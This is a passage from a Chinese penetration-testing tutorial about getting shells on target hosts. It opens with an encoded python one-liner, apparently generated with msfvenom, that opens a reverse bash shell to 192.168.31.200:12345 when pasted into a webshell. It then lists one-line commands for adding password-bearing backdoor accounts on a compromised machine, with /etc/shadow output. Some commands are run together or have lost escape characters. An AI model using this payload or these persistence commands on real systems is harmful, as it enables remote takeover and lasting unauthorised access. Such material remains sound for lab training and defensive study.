python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAgLCBzdWJwcm9jZXNzICAgICAgICAsIG9zICAgICAgICA7ICBob3N0PSIxOTIuMTY4LjMxLjIwMCIgICAgICAgIDsgIHBvcnQ9MTIzNDUgICAgICAgIDsgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgICwgcG9ydCkpICAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICwgMCkgICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgLCAxKSAgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAsIDIpICAgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"直接将上面msfvenon 生成的 python 一句话复制到靶机webshell上运行即可 ， 我这里为演示方便 ， 直接贴了一张使用kali做为靶机运行的截图 。
文章插图
（4） 攻击监听接受反弹情况
文章插图
三、场景三
文章插图
场景三其实应该是在使用shell环境获取的过程中遇到的问题孕育出来的 ， 大家如果经常使用前各种方法进行虚拟终端环境获取的话 ， 会发现存在一个问题 ， 就是我们即使获取了目标虚拟终端控制权限 ， 但是往往会发现交互性非常的差 ， 就是发现这个虚拟回显信息与可交互性非常的差和不稳定 ， 具体见情况有以下几个种 。
问题1： 获取的虚拟终端没有交互性 ， 我们想给添加的账号设置密码 ， 无法完成 。
问题2：标准的错误输出无法显示 ， 无法正常使用vim等文本编辑器等；
问题3： 获取的目标主机的虚拟终端使用非常不稳定 ， 很容易断开连接 。
针对以上问题个人学习和总结了以下的应对方法 ， 请大家参考交流 。
3.1 一句话添加账号
你不是不给我提供交互的界面吗 ， 那我就是使用脚本式的方法 ， 使用一句话完成账号密码的添加 ， 有关一句话账号密码的添加 ， 笔者收集了以下几种方式 。
3.1.1 chpasswd 方法
（1）执行语句
useradd newuser;echo "newuser:password"|chpasswd（2）操作实例
useradd -p encrypted_password newuser3.1.2 useradd -p 方法
（1） 执行语句
useradd -p encrypted_password newuser（2） 操作实例
root@ifly-21171:~# useradd -p `openssl passwd 123456` guestroot@ifly-21171:~# vim /etc/shadowsshd:*:17255:0:99999:7:::pollinate:*:17255:0:99999:7:::postgres:*:17390:0:99999:7:::guest:h8S5msqJLVTfo:17425:0:99999:7:::（3） 相同方法其他实现
相同方法不同实现一
root@ifly-21171:~# useradd -p "$(openssl passwd 123456)" guestroot@ifly-21171:~#相同方法不同实现二
user_password="`openssl passwd 123456`"useradd -p "$user_password" guest3.1.3 echo -e 方法
（1）执行语句
useradd newuwer;echo -e "123456n123456n" |passwd newuser（2） 操作实例
root@ifly-21171:~# useradd test;echo -e "123456n123456n" |passwd testEnter new UNIX password: Retype new UNIX password: passwd: password updated successfullyroot@ifly-21171:~# vim /etc/shadowsshd:*:17255:0:99999:7:::pollinate:*:17255:0:99999:7:::postgres:*:17390:0:99999:7:::guest:h/UnnFIjqKogw:17425:0:99999:7:::test:$6$rEjvwAb2$nJuZ1MDt0iKbW9nigp8g54ageiKBDuoLObLd1kWUC2FmLS0xCFFZmU4dzRtX/i2Ypm9uY6oKrSa9gzQ6qykzW1:17425:0:99999:7:::